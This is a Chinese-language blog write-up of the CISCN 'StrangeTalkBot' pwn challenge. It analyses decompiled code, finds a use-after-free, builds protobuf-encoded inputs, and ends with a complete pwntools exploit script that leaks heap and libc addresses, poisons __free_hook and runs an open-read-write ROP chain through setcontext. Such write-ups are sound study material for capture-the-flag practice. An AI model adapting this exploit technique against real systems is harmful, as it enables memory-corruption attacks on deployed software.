<!DOCTYPE html>
<html lang="zh-CN">
<head>
    <meta charset="utf-8">
    <meta name="viewport" content="width=device-width, initial-scale=1">
    <meta name="keywords" content="Hexo Theme Redefine">
    <meta name="description" content="Hexo Theme Redefine">
    <meta name="author" content="b4nd1t">
    <link rel="apple-touch-icon" sizes="180x180" href="/images/apple-touch-icon-redefine.png">
    <!-- preconnect -->
    <link rel="preconnect" href="https://fonts.googleapis.com">
    <link rel="preconnect" href="https://fonts.gstatic.com" crossorigin>
    <link rel="preconnect" href="https://evan.beee.top" crossorigin>
    
    <!--- Seo Part-->
    
    <link rel="canonical" href="http://example.com/2023/06/04/strangetalkbot/"/>
    <meta name="robots" content="index,follow">
    <meta name="googlebot" content="index,follow">
    <meta name="revisit-after" content="1 days">
    
        <meta name="description" content="ciscn_StrangeTalkBot">
<meta property="og:type" content="article">
<meta property="og:title" content="StrangeTalkBot">
<meta property="og:url" content="http://example.com/2023/06/04/StrangeTalkBot/index.html">
<meta property="og:site_name" content="b4nd1t&#39;s blog">
<meta property="og:description" content="ciscn_StrangeTalkBot">
<meta property="og:locale" content="zh_CN">
<meta property="og:image" content="http://example.com/img/1685854368522.png">
<meta property="og:image" content="http://example.com/img/1685855884721.png">
<meta property="og:image" content="http://example.com/img/1685856028701.png">
<meta property="og:image" content="http://example.com/img/1685856564295.png">
<meta property="og:image" content="http://example.com/img/1685856240124.png">
<meta property="og:image" content="http://example.com/img/1685855216244.png">
<meta property="og:image" content="http://example.com/img/1685855400657.png">
<meta property="og:image" content="http://example.com/img/1685855502020.png">
<meta property="og:image" content="http://example.com/img/1685856667387.png">
<meta property="article:published_time" content="2023-06-04T04:51:11.000Z">
<meta property="article:modified_time" content="2023-06-04T05:36:15.626Z">
<meta property="article:author" content="b4nd1t">
<meta name="twitter:card" content="summary">
<meta name="twitter:image" content="http://example.com/img/1685854368522.png">
    
    <!--- Icon Part-->
    <link rel="icon" type="image/png" href="/images/redefine-favicon.svg" sizes="192x192">
    <link rel="apple-touch-icon" sizes="180x180" href="/images/redefine-favicon.svg">
    <meta name="theme-color" content="#A31F34">
    <link rel="shortcut icon" href="/images/redefine-favicon.svg">
    <!--- Page Info-->
    
    <title>
        
            StrangeTalkBot -
        
        b4nd1t&#39;s blog
    </title>
    
<link rel="stylesheet" href="/css/style.css">

    
<link rel="stylesheet" href="/assets/fonts.css">

    <!--- Font Part-->
    
    
    
    

    <!--- Inject Part-->
    
    <script id="hexo-configurations">
    let Global = window.Global || {};
    Global.hexo_config = {"hostname":"example.com","root":"/","language":"zh-CN"};
    Global.theme_config = {"articles":{"style":{"font_size":"16px","line_height":1.5,"image_border_radius":"14px","image_alignment":"center"},"word_count":{"enable":true,"count":true,"min2read":true},"author_label":{"enable":true,"auto":false,"list":[""]},"code_block":{"copy":true,"style":"mac","font":{"enable":false,"family":null,"url":null}},"toc":{"enable":true,"max_depth":3,"number":false,"expand":true,"init_open":true},"copyright":false,"lazyload":true,"recommendation":{"enable":false,"title":"推荐阅读","limit":3,"placeholder":"/images/wallhaven-wqery6-light.webp","skip_dirs":[]}},"colors":{"primary":"#A31F34","secondary":null},"global":{"fonts":{"chinese":{"enable":false,"family":null,"url":null},"english":{"enable":false,"family":null,"url":null}},"content_max_width":"1000px","sidebar_width":"210px","hover":{"shadow":true,"scale":false},"scroll_progress":{"bar":false,"percentage":true},"busuanzi_counter":{"enable":true,"site_pv":true,"site_uv":true,"post_pv":true},"pjax":true,"open_graph":true},"home_banner":{"enable":true,"image":{"light":"/images/wallhaven-wqery6-light.webp","dark":"/images/wallhaven-wqery6-dark.webp"},"title":"WHWH","subtitle":{"text":["“1 + 1”"],"typing_speed":100,"backing_speed":80,"starting_delay":500,"backing_delay":1500,"loop":true,"smart_backspace":true},"text_color":{"light":"#fff","dark":"#d1d1b6"},"text_style":{"title_size":"2.8rem","subtitle_size":"1.5rem","line_height":1.2},"custom_font":{"enable":false,"family":null,"url":null},"social_links":{"enable":true,"links":{"github":"https://github.com/7bandit","instagram":null,"zhihu":null,"twitter":null,"email":null}}},"plugins":{"feed":{"enable":false},"aplayer":{"enable":false,"audios":[{"name":null,"artist":null,"url":null,"cover":null},{"name":null,"artist":null,"url":null,"cover":null}]},"mermaid":{"enable":false,"version":"9.3.0"}},"version":"2.0.3","navbar":{"auto_hide":false,"color":{"left":"#f78736","right":"#367df7","transparency":35},"links":{"Home":{"path":"/","icon":"fa-regular fa-house"}},"search":{"enable":false,"preload":true}},"page_templates":{"friends_column":2,"tags_style":"blur"},"home":{"article_date_format":"auto","categories":{"enable":true,"limit":3},"tags":{"enable":true,"limit":3}}};
    Global.language_ago = {"second":"%s 秒前","minute":"%s 分钟前","hour":"%s 小时前","day":"%s 天前","week":"%s 周前","month":"%s 个月前","year":"%s 年前"};
  </script>
    
    <!--- Fontawesome Part-->
    
<link rel="stylesheet" href="/fontawesome/fontawesome.min.css">

    
<link rel="stylesheet" href="/fontawesome/brands.min.css">

    
<link rel="stylesheet" href="/fontawesome/solid.min.css">

    
<link rel="stylesheet" href="/fontawesome/regular.min.css">

    
    
    
    
<meta name="generator" content="Hexo 6.2.0"></head>


<body>
<div class="progress-bar-container">
    

    
        <span class="pjax-progress-bar"></span>
        <span class="pjax-progress-icon">
            <i class="fa-solid fa-circle-notch fa-spin"></i>
        </span>
    
</div>


<main class="page-container">

    

    <div class="main-content-container">

        <div class="main-content-header">
            <header class="navbar-container">
    
    <div class="navbar-content">
        <div class="left">
            
            <a class="logo-title" href="/">
                
                b4nd1t&#39;s blog
                
            </a>
        </div>

        <div class="right">
            <!-- PC -->
            <div class="desktop">
                <ul class="navbar-list">
                    
                        
                            <li class="navbar-item">
                                <!-- Menu -->
                                <a class="" 
                                    href="/"  >
                                    
                                        
                                            <i class="fa-regular fa-house"></i>
                                        
                                        首页
                                    
                                </a>
                                <!-- Submenu -->
                                
                            </li>
                    
                    
                </ul>
            </div>
            <!-- Mobile -->
            <div class="mobile">
                
                <div class="icon-item navbar-bar">
                    <div class="navbar-bar-middle"></div>
                </div>
            </div>
        </div>
    </div>

    <!-- Mobile drawer -->
    <div class="navbar-drawer">
        <ul class="drawer-navbar-list">
            
                
                    <li class="drawer-navbar-item flex-center">
                        <a class="" 
                        href="/"  >
                             
                                
                                    <i class="fa-regular fa-house"></i>
                                
                                首页
                            
                        </a>
                    </li>
                    <!-- Submenu -->
                    
            

        </ul>
    </div>

    <div class="window-mask"></div>

</header>


        </div>

        <div class="main-content-body">

            <div class="main-content">

                
                    <div class="fade-in-down-animation">
    <div class="post-page-container">
        <div class="article-content-container">

            
            
                <div class="article-title">
                    <h1 class="article-title-regular">StrangeTalkBot</h1>
                </div>
            
                
            

            
                <div class="article-header">
                    <div class="avatar">
                        <img src="/images/redefine-avatar.svg">
                    </div>
                    <div class="info">
                        <div class="author">
                            <span class="name">b4nd1t</span>
                            
                                <span class="author-label"></span>
                            
                        </div>
                        <div class="meta-info">
                            <div class="article-meta-info">
    <span class="article-date article-meta-item">
        <i class="fa-regular fa-pen-fancy"></i>&nbsp;
        <span class="desktop">2023-06-04 12:51:11</span>
        <span class="mobile">2023-06-04 12:51</span>
        <span class="hover-info">创建</span>
    </span>
    
        <span class="article-date article-meta-item">
            <i class="fa-regular fa-wrench"></i>&nbsp;
            <span class="desktop">2023-06-04 13:36:15</span>
            <span class="mobile">2023-06-04 13:36</span>
            <span class="hover-info">更新</span>
        </span>
    

    
        <span class="article-categories article-meta-item">
            <i class="fa-regular fa-folders"></i>&nbsp;
            <ul>
                
                    <li>
                        <a href="/categories/pwn/">pwn</a>&nbsp;
                    </li>
                
            </ul>
        </span>
    
    

    
    
    
    
</div>

                        </div>
                    </div>
                </div>
            

            <div class="article-content markdown-body">
                <h1 id="ciscn-StrangeTalkBot"><a href="#ciscn-StrangeTalkBot" class="headerlink" title="ciscn_StrangeTalkBot"></a>ciscn_StrangeTalkBot</h1><span id="more"></span>

<h2 id="保护检查"><a href="#保护检查" class="headerlink" title="保护检查"></a>保护检查</h2><p><img  
                     lazyload
                     src="/images/loading.svg"
                     data-src="/../img/1685854368522.png"
                      alt="1685854368522"
                ></p>
<h2 id="源码分析"><a href="#源码分析" class="headerlink" title="源码分析"></a>源码分析</h2><h3 id="main"><a href="#main" class="headerlink" title="main"></a>main</h3><div class="highlight-container" data-rel="Plaintext"><figure class="iseeu highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br></pre></td><td class="code"><pre><span class="line">void __fastcall __noreturn main(__int64 a1, char **a2, char **a3)</span><br><span class="line">&#123;</span><br><span class="line">  __int64 v3; // [rsp+0h] [rbp-10h]</span><br><span class="line">  __int64 v4; // [rsp+8h] [rbp-8h]</span><br><span class="line"></span><br><span class="line">  sub_1763();</span><br><span class="line">  while ( 1 )</span><br><span class="line">  &#123;</span><br><span class="line">    memset(byte_A060, 0, sizeof(byte_A060));</span><br><span class="line">    puts(&quot;You can try to have friendly communication with me now: &quot;);</span><br><span class="line">    v3 = read(0, byte_A060, 0x400uLL);</span><br><span class="line">    v4 = sub_192D(0LL, v3, (__int64)byte_A060);</span><br><span class="line">    if ( !v4 )</span><br><span class="line">      break;</span><br><span class="line">    sub_155D(</span><br><span class="line">      *(_QWORD *)(v4 + 24),</span><br><span class="line">      *(_QWORD *)(v4 + 32),</span><br><span class="line">      *(_QWORD *)(v4 + 40),</span><br><span class="line">      *(_QWORD *)(v4 + 48),</span><br><span class="line">      *(const void **)(v4 + 56));</span><br><span class="line">  &#125;</span><br><span class="line">  sub_1329();</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure></div>

<p>首先需要进行输入，然后在<code>v4 = sub_192D(0LL, v3, (__int64)byte_A060);</code>进行处理，v4不等于0才能进入后来的操作，这个<code>sub_192D(0LL, v3, (__int64)byte_A060)</code>里面很长，一点也看不懂，看到网上的师傅说这是protobuf。</p>
<h3 id="sub-155D"><a href="#sub-155D" class="headerlink" title="sub_155D"></a>sub_155D</h3><div class="highlight-container" data-rel="Plaintext"><figure class="iseeu highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br></pre></td><td class="code"><pre><span class="line">char *__fastcall sub_155D(__int64 choice, unsigned __int64 index, __int64 size_1, __int64 len, const void *content)</span><br><span class="line">&#123;</span><br><span class="line">  size_t v6; // [rsp+18h] [rbp-18h]</span><br><span class="line"></span><br><span class="line">  v6 = size_1;</span><br><span class="line">  if ( index &gt;= 0x21 )</span><br><span class="line">    sub_1329();</span><br><span class="line">  if ( (unsigned __int64)len &gt;= 0xF1 )</span><br><span class="line">    sub_1329();</span><br><span class="line">  if ( (unsigned __int64)size_1 &gt;= 0xF1 )</span><br><span class="line">    sub_1329();</span><br><span class="line">  if ( size_1 &lt; len )</span><br><span class="line">    v6 = len;</span><br><span class="line">  if ( choice == 4 )</span><br><span class="line">    return delete(index);</span><br><span class="line">  if ( choice &gt; 4 )</span><br><span class="line">    goto LABEL_19;</span><br><span class="line">  if ( choice == 3 )</span><br><span class="line">    return (char *)show(index);</span><br><span class="line">  if ( choice == 1 )</span><br><span class="line">    return (char *)add(index, v6, len, content);</span><br><span class="line">  if ( choice != 2 )</span><br><span class="line">LABEL_19:</span><br><span class="line">    sub_1329();</span><br><span class="line">  return (char *)edit(index, len, content);</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure></div>

<p>到这应该就是正常的堆题了，前几个增改查都是挺正常</p>
<h3 id="delete"><a href="#delete" class="headerlink" title="delete"></a>delete</h3><div class="highlight-container" data-rel="Plaintext"><figure class="iseeu highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br></pre></td><td class="code"><pre><span class="line">char *__fastcall delete(__int64 a1)</span><br><span class="line">&#123;</span><br><span class="line">  char *result; // rax</span><br><span class="line"></span><br><span class="line">  result = (char *)*((_QWORD *)&amp;unk_A460 + a1);</span><br><span class="line">  if ( result )</span><br><span class="line">  &#123;</span><br><span class="line">    free(*((void **)&amp;unk_A460 + a1));</span><br><span class="line">    result = &amp;byte_A060[a1];</span><br><span class="line">    byte_A060[a1] = 0;</span><br><span class="line">  &#125;</span><br><span class="line">  return result;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure></div>

<p>在delete函数中没有把指针置零，代码中置零的地方好像无关紧要，有uaf漏洞</p>
<h2 id="思路"><a href="#思路" class="headerlink" title="思路"></a>思路</h2><p>程序开了沙箱，我们就需要进行orw操作，但是rop链只能在栈上才可以利用，目前只能在对上构造rop链，这时就需要用到setcontext函数<img  
                     lazyload
                     src="/images/loading.svg"
                     data-src="/../img/1685855884721.png"
                      alt="1685855884721"
                ></p>
<p>在函数中会对一些寄存器进行赋值操作</p>
<p><img  
                     lazyload
                     src="/images/loading.svg"
                     data-src="/../img/1685856028701.png"
                      alt="1685856028701"
                ></p>
<p>最开始了解到的是基于rdi进行赋值，这个还没注意，发现已经变成了基于rdx赋值，还有变化就是以前是<code>push rcx</code>和<code>ret</code>操作，现在把rcx变成了r10，但是偏移还是没变的。</p>
<p><img  
                     lazyload
                     src="/images/loading.svg"
                     data-src="/../img/1685856564295.png"
                      alt="1685856564295"
                ></p>
<p>所以利用hook的时候不能直接跳到这，应该先想办法给rdx进行赋值，看到其他师傅用的这个</p>
<p><img  
                     lazyload
                     src="/images/loading.svg"
                     data-src="/../img/1685856240124.png"
                      alt="1685856240124"
                ></p>
<p>我们可以在堆上先布置好信息，这样就可以先给rdx赋值，然后再利用后面的<code>call</code>操作跳到setcontext的代码处，然后进行正常操作</p>
<h2 id="初识protobuf"><a href="#初识protobuf" class="headerlink" title="初识protobuf"></a>初识protobuf</h2><h3 id="安装"><a href="#安装" class="headerlink" title="安装"></a>安装</h3><p><code>sudo apt-get install protobuf-compiler</code></p>
<h3 id="创建proto文件"><a href="#创建proto文件" class="headerlink" title="创建proto文件"></a>创建proto文件</h3><p>在ida中有协议词</p>
<p><img  
                     lazyload
                     src="/images/loading.svg"
                     data-src="/../img/1685855216244.png"
                      alt="1685855216244"
                ></p>
<p>创建一个 devicmesg.proto文件</p>
<div class="highlight-container" data-rel="Plaintext"><figure class="iseeu highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br></pre></td><td class="code"><pre><span class="line">syntax = &#x27;proto3&#x27;;</span><br><span class="line">package pack.base;</span><br><span class="line"></span><br><span class="line"> </span><br><span class="line"></span><br><span class="line">message devicmesg &#123;</span><br><span class="line"></span><br><span class="line"> sint32 actionid = 1;</span><br><span class="line"></span><br><span class="line"> sint32 msgidx = 2;</span><br><span class="line"></span><br><span class="line"> sint32 msgsize = 3;</span><br><span class="line"></span><br><span class="line"> bytes msgcontent = 4;</span><br><span class="line"></span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure></div>

<p>创建一个文件夹output</p>
<p>然后进行编译<code>protoc --python_out=./output ./devicmesg.proto</code>,就会在output目录下生成一个py文件</p>
<p><img  
                     lazyload
                     src="/images/loading.svg"
                     data-src="/../img/1685855400657.png"
                      alt="1685855400657"
                ></p>
<p>这样就可以在python脚本中使用protobuf了</p>
<p>此时我的目录中<img  
                     lazyload
                     src="/images/loading.svg"
                     data-src="/../img/1685855502020.png"
                      alt="1685855502020"
                ></p>
<h2 id="exp"><a href="#exp" class="headerlink" title="exp"></a>exp</h2><div class="highlight-container" data-rel="Plaintext"><figure class="iseeu highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br><span class="line">52</span><br><span class="line">53</span><br><span class="line">54</span><br><span class="line">55</span><br><span class="line">56</span><br><span class="line">57</span><br><span class="line">58</span><br><span class="line">59</span><br><span class="line">60</span><br><span class="line">61</span><br><span class="line">62</span><br><span class="line">63</span><br><span class="line">64</span><br><span class="line">65</span><br><span class="line">66</span><br><span class="line">67</span><br><span class="line">68</span><br><span class="line">69</span><br><span class="line">70</span><br><span class="line">71</span><br><span class="line">72</span><br><span class="line">73</span><br><span class="line">74</span><br><span class="line">75</span><br><span class="line">76</span><br><span class="line">77</span><br><span class="line">78</span><br><span class="line">79</span><br><span class="line">80</span><br><span class="line">81</span><br><span class="line">82</span><br><span class="line">83</span><br><span class="line">84</span><br><span class="line">85</span><br><span class="line">86</span><br><span class="line">87</span><br><span class="line">88</span><br><span class="line">89</span><br><span class="line">90</span><br><span class="line">91</span><br><span class="line">92</span><br><span class="line">93</span><br><span class="line">94</span><br><span class="line">95</span><br></pre></td><td class="code"><pre><span class="line">from pwn import *</span><br><span class="line">from ctypes import *</span><br><span class="line">import sys</span><br><span class="line">sys.path.append(&#x27;./output&#x27;) //将当前目录下的 &quot;output&quot; 文件夹添加到 Python 解释器的模块搜索路径中</span><br><span class="line">import devicmesg_pb2</span><br><span class="line">context(os=&#x27;linux&#x27;,arch=&#x27;amd64&#x27;,log_level=&#x27;debug&#x27;)</span><br><span class="line">p = process(&quot;./pwn&quot;)</span><br><span class="line">libc = ELF(&quot;./libc-2.31.so&quot;)</span><br><span class="line">def debug():</span><br><span class="line">	gdb.attach(p)</span><br><span class="line">def add(index,size,content):</span><br><span class="line">	msg = devicmesg_pb2.devicmesg()</span><br><span class="line">	msg.actionid = 1</span><br><span class="line">	msg.msgidx = index</span><br><span class="line">	msg.msgsize = size</span><br><span class="line">	msg.msgcontent = content</span><br><span class="line">	payload = msg.SerializeToString()</span><br><span class="line">	p.recv()</span><br><span class="line">	p.send(payload)</span><br><span class="line">def edit(index,size,content):</span><br><span class="line">	msg = devicmesg_pb2.devicmesg()</span><br><span class="line">	msg.actionid = 2</span><br><span class="line">	msg.msgidx = index</span><br><span class="line">	msg.msgsize = size</span><br><span class="line">	msg.msgcontent = content</span><br><span class="line">	payload = msg.SerializeToString()</span><br><span class="line">	p.recv()</span><br><span class="line">	p.send(payload)</span><br><span class="line">def show(index):</span><br><span class="line">	msg = devicmesg_pb2.devicmesg()</span><br><span class="line">	msg.actionid = 3</span><br><span class="line">	msg.msgidx = index</span><br><span class="line">	msg.msgsize = 1</span><br><span class="line">	msg.msgcontent = &quot;aa&quot;</span><br><span class="line">	payload = msg.SerializeToString()</span><br><span class="line">	p.recv()</span><br><span class="line">	p.send(payload)</span><br><span class="line">def delete(index):</span><br><span class="line">	msg = devicmesg_pb2.devicmesg()</span><br><span class="line">	msg.actionid = 4</span><br><span class="line">	msg.msgidx = index</span><br><span class="line">	msg.msgsize = 1</span><br><span class="line">	msg.msgcontent = &quot;aa&quot;</span><br><span class="line">	payload = msg.SerializeToString()</span><br><span class="line">	p.recv()</span><br><span class="line">	p.send(payload)</span><br><span class="line"></span><br><span class="line">for i in range(1,10):</span><br><span class="line">	add(i,0xf0,&quot;aa&quot;)</span><br><span class="line">for i in range(1,9):</span><br><span class="line">	delete(i)</span><br><span class="line">show(8)</span><br><span class="line">p.recv(0x38)</span><br><span class="line">heap_base = u64(p.recv(8)) - 0xd70</span><br><span class="line">p.recv(0x18)</span><br><span class="line">libcbase = u64(p.recvuntil(&quot;\x7f&quot;)[-6:].ljust(8,&#x27;\x00&#x27;)) - 0x1ECBE0</span><br><span class="line">print(hex(heap_base))</span><br><span class="line">print(hex(libcbase))</span><br><span class="line">free_hook = libcbase + libc.sym[&#x27;__free_hook&#x27;]</span><br><span class="line">setcontext = libcbase + 0x54F5D</span><br><span class="line">pop_rdi_ret = libcbase + 0x0000000000023b6a</span><br><span class="line">pop_rsi_ret = libcbase + 0x000000000002601f</span><br><span class="line">pop_rdx_ret = libcbase + 0x0000000000142c92</span><br><span class="line">open_addr = libcbase + libc.sym[&#x27;open&#x27;]</span><br><span class="line">read_addr = libcbase + libc.sym[&#x27;read&#x27;]</span><br><span class="line">write_addr = libcbase + libc.sym[&#x27;write&#x27;]</span><br><span class="line">mov_rdx_rdi_ = libcbase + 0x151990</span><br><span class="line">add(10,0x20,&quot;aa&quot;)</span><br><span class="line">add(11,0x20,&quot;aa&quot;)</span><br><span class="line">delete(11)</span><br><span class="line">delete(10)</span><br><span class="line">payload = p64(free_hook - 8)</span><br><span class="line">edit(10,0x20,payload)</span><br><span class="line">add(12,0x20,&quot;aa&quot;)</span><br><span class="line">payload = &#x27;\x00&#x27;*8 + p64(mov_rdx_rdi_)</span><br><span class="line">add(13,0x20,payload)</span><br><span class="line">ret = libcbase + 0x0000000000022679</span><br><span class="line">orw = heap_base + 0x310</span><br><span class="line">flag = orw + 8*17</span><br><span class="line">buf = heap_base + 0x3000</span><br><span class="line">payload = (p64(heap_base + 0x1700)*2 + p64(setcontext)*4).ljust(0xa0, &#x27;\x00&#x27;) + p64(orw) + p64(ret)</span><br><span class="line">add(14,0xc0,payload)</span><br><span class="line"></span><br><span class="line">rop = p64(pop_rdi_ret) + p64(flag) + p64(pop_rsi_ret) + p64(0) + p64(pop_rdx_ret) + p64(0) + p64(open_addr)</span><br><span class="line">rop += p64(pop_rdi_ret) + p64(3) + p64(pop_rsi_ret) + p64(buf) + p64(pop_rdx_ret) + p64(0x20) + p64(read_addr)</span><br><span class="line">rop += p64(pop_rdi_ret) + p64(1) + p64(write_addr)</span><br><span class="line">rop += &quot;flag\x00\x00\x00&quot;</span><br><span class="line">edit(1,0xf0,rop)</span><br><span class="line">#debug()</span><br><span class="line"></span><br><span class="line">delete(14)</span><br><span class="line"></span><br><span class="line">#debug()</span><br><span class="line"></span><br><span class="line">p.interactive()</span><br></pre></td></tr></table></figure></div>

<p><img  
                     lazyload
                     src="/images/loading.svg"
                     data-src="/../img/1685856667387.png"
                      alt="1685856667387"
                ></p>
<h2 id="参考"><a href="#参考" class="headerlink" title="参考"></a>参考</h2><p><a class="link"   target="_blank" rel="noopener" href="http://t.csdn.cn/4clfJ" >http://t.csdn.cn/4clfJ <i class="fa-regular fa-arrow-up-right-from-square fa-sm"></i></a></p>
<p><a class="link"   target="_blank" rel="noopener" href="http://t.csdn.cn/wr3YH" >http://t.csdn.cn/wr3YH <i class="fa-regular fa-arrow-up-right-from-square fa-sm"></i></a></p>

            </div>

            

            

            

            
                <div class="article-nav">
                    
                        <div class="article-prev">
                            <a class="prev"
                            rel="prev"
                            href="/2023/06/07/stormnote/"
                            >
                                <span class="left arrow-icon flex-center">
                                    <i class="fa-solid fa-chevron-left"></i>
                                </span>
                                <span class="title flex-center">
                                    <span class="post-nav-title-item">stormnote</span>
                                    <span class="post-nav-item">上一篇</span>
                                </span>
                            </a>
                        </div>
                    
                    
                        <div class="article-next">
                            <a class="next"
                            rel="next"
                            href="/2023/05/31/ciscn-funcanary/"
                            >
                                <span class="title flex-center">
                                    <span class="post-nav-title-item">ciscn_funcanary</span>
                                    <span class="post-nav-item">下一篇</span>
                                </span>
                                <span class="right arrow-icon flex-center">
                                    <i class="fa-solid fa-chevron-right"></i>
                                </span>
                            </a>
                        </div>
                    
                </div>
            


            
        </div>

        
            <div class="toc-content-container">
                <div class="post-toc-wrap">
    <div class="post-toc">
        <div class="toc-title">此页目录</div>
        <div class="page-title">StrangeTalkBot</div>
        <ol class="nav"><li class="nav-item nav-level-1"><a class="nav-link" href="#ciscn-StrangeTalkBot"><span class="nav-text">ciscn_StrangeTalkBot</span></a><ol class="nav-child"><li class="nav-item nav-level-2"><a class="nav-link" href="#%E4%BF%9D%E6%8A%A4%E6%A3%80%E6%9F%A5"><span class="nav-text">保护检查</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#%E6%BA%90%E7%A0%81%E5%88%86%E6%9E%90"><span class="nav-text">源码分析</span></a><ol class="nav-child"><li class="nav-item nav-level-3"><a class="nav-link" href="#main"><span class="nav-text">main</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#sub-155D"><span class="nav-text">sub_155D</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#delete"><span class="nav-text">delete</span></a></li></ol></li><li class="nav-item nav-level-2"><a class="nav-link" href="#%E6%80%9D%E8%B7%AF"><span class="nav-text">思路</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#%E5%88%9D%E8%AF%86protobuf"><span class="nav-text">初识protobuf</span></a><ol class="nav-child"><li class="nav-item nav-level-3"><a class="nav-link" href="#%E5%AE%89%E8%A3%85"><span class="nav-text">安装</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#%E5%88%9B%E5%BB%BAproto%E6%96%87%E4%BB%B6"><span class="nav-text">创建proto文件</span></a></li></ol></li><li class="nav-item nav-level-2"><a class="nav-link" href="#exp"><span class="nav-text">exp</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#%E5%8F%82%E8%80%83"><span class="nav-text">参考</span></a></li></ol></li></ol>

    </div>
</div>
            </div>
        
    </div>
</div>


                

            </div>



        </div>

        <div class="main-content-footer">
            <footer class="footer">
    <div class="info-container">
        <div class="copyright-info">
            &copy;
            
              <span>2022</span>
              -
            
            2023&nbsp;&nbsp;<i class="fa-solid fa-heart fa-beat" style="--fa-animation-duration: 0.5s; color: #f54545"></i>&nbsp;&nbsp;<a href="/">b4nd1t</a>
        </div>
        
            <script async data-pjax src="//busuanzi.ibruce.info/busuanzi/2.3/busuanzi.pure.mini.js"></script>
            <div class="website-count info-item">
                
                    <span id="busuanzi_container_site_uv" class="busuanzi_container_site_uv">
                        访问人数&nbsp;<span id="busuanzi_value_site_uv" class="busuanzi_value_site_uv"></span>
                    </span>
                
                
                    <span id="busuanzi_container_site_pv" class="busuanzi_container_site_pv">
                        总访问量&nbsp;<span id="busuanzi_value_site_pv" class="busuanzi_value_site_pv"></span>
                    </span>
                
            </div>
        
        <div class="theme-info info-item">
            <span class="powered-by-container">由 <?xml version="1.0" encoding="utf-8"?><!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN" "http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd"><svg version="1.1" id="圖層_1" xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" x="0px" y="0px" width="1rem" height="1rem" viewBox="0 0 512 512" enable-background="new 0 0 512 512" xml:space="preserve"><path fill="#0E83CD" d="M256.4,25.8l-200,115.5L56,371.5l199.6,114.7l200-115.5l0.4-230.2L256.4,25.8z M349,354.6l-18.4,10.7l-18.6-11V275H200v79.6l-18.4,10.7l-18.6-11v-197l18.5-10.6l18.5,10.8V237h112v-79.6l18.5-10.6l18.5,10.8V354.6z"/></svg><a target="_blank" href="https://hexo.io">Hexo</a> 驱动</span>
                <br>
            <span class="theme-version-container">主题&nbsp;<a class="theme-version" target="_blank" href="https://github.com/EvanNotFound/hexo-theme-redefine">Redefine v2.0.3</a>
        </div>
        
        
        
            <div id="start_div" style="display:none">
                2022/8/17 11:45:14
            </div>
            <div>
                博客已运行 <span class="odometer" id="runtime_days" ></span> 天 <span class="odometer" id="runtime_hours"></span> 小时 <span class="odometer" id="runtime_minutes"></span> 分钟 <span class="odometer" id="runtime_seconds"></span> 秒
            </div>
        
        
        
            <script async data-pjax>
                try {
                    function odometer_init() {
                    const elements = document.querySelectorAll('.odometer');
                    elements.forEach(el => {
                        new Odometer({
                            el,
                            format: '( ddd).dd',
                            duration: 200
                        });
                    });
                    }
                    odometer_init();
                } catch (error) {}
            </script>
        
        
        
    </div>  
</footer>
        </div>
